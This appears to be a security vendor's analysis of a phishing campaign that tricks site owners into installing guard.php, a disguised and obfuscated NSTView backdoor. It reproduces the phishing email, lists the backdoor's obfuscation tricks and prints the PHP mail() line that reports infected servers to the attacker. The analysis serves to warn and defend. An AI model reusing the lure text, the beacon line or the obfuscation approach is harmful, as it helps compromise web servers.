Mirror, mirror on the wall, who is the lamest of them all? Theattacker behind this scheme hopes to find out where all the l4m3rs are(his words not mine). In a classic social engineering attack, customershave been reporting that they have received an unusual piece of spamrecently.
The mail is supposedly from a hosting or collocation company and says something along the lines of this:
Dear COMPANYNAME Inc. Valued Members,
Regarding our new security regulations, as a part of our yearlymaintenance we have provided a security guard script in the attachment.
So, to secure your Web sites, please use the attached file and (forUNIX/Linux Based servers) upload the file "guard.php" in:"./public_html"
or (for Windows Based servers which use ASP) upload the file "guard.asp" in: "./wwwroot" in your site.
Thank you for using our services and products. We look forward to providing you with a unique and high quality service.
The email may sound plausible to some people. For someone who knowsenough to set up a site, but perhaps not much about security, thisemail could sound convincing. These emails appear to be targeted atspecific email addresses and have been received by customers of largehosting companies. The email arrives with the attachment guard.zip,which contains guard.php for linux servers and guard.asp for windowsservers. Included in the email are detailed instructions about whichscript to use and how to install the appropriate script. Theinstructions are written in the same manner as instructions you mightexpect to receive from a computer help desk.
The script guard.php that is attached to the email is in fact a backdoor (Backdoor.Lamer) that allows the attacker full access to theserver it is run on. The guard.php script is actually an encodedversion of a publicly available remote administration tool calledNSTView.
The script contains a few tricks to hide what it is doing:
• Initially it is base64 encoded (twice)
• Uses a translation table to obfuscate more
• The html contained inside is encoded
• All decoding happens in real time, so no other files need to be created or dropped
The back door sends a notification email to firstname.lastname@example.org the address of the infected server. The address is base64encoded; in the case below “MTI3LjAuMC4x” = 127.0.0.1 – the address ofthe test server.
Note the "FROM:" address of the email is sent from "L4m3r" – that’sright it's not enough that the attacker will be able to have fullcontrol of your server, but he even mocks you in the notificationemail!
MAIL FROM: RCPT TO: MAIL FROM: RCPT TO: Date: Tue, 20 Feb 2007 04:26:15 +0000
Subject: Windows NT TEST SERVER 5.1 build 2600
To accomplish this notification process the attacker has made a slight modification to the NSTView script adding the line:
mail('email@example.com' , ''.php_uname(), base64_encode($_SERVER['HTTP_HOST'] . $PHP_SELF) , "From: L4M3r
I am sure that this email account will be shut down pretty soon, ifnot already, but it appears as though the attacker considered thatpossibility too. The NSTView script has been slightly modified further;there is encoded html appended to the end of the script. This encodedhtml is partly just what you see when you visit guard.php (see below),but there is also a hidden iframe that points to a newly created domain– by checking which sites have been requesting pages from that domain,the attacker can see which servers are vulnerable without everaccessing the gmail address.
What the guard.php page looks like when visited in the browser:
This shows the interface and commands available to the attacker (this is also from NSTVIEW):
IMPORTANT: NSTView itself is not malware, it is apublicly available script for remote administration; the attacker herehas modified and encoded it to hide what the attacker really performson the unsuspecting user.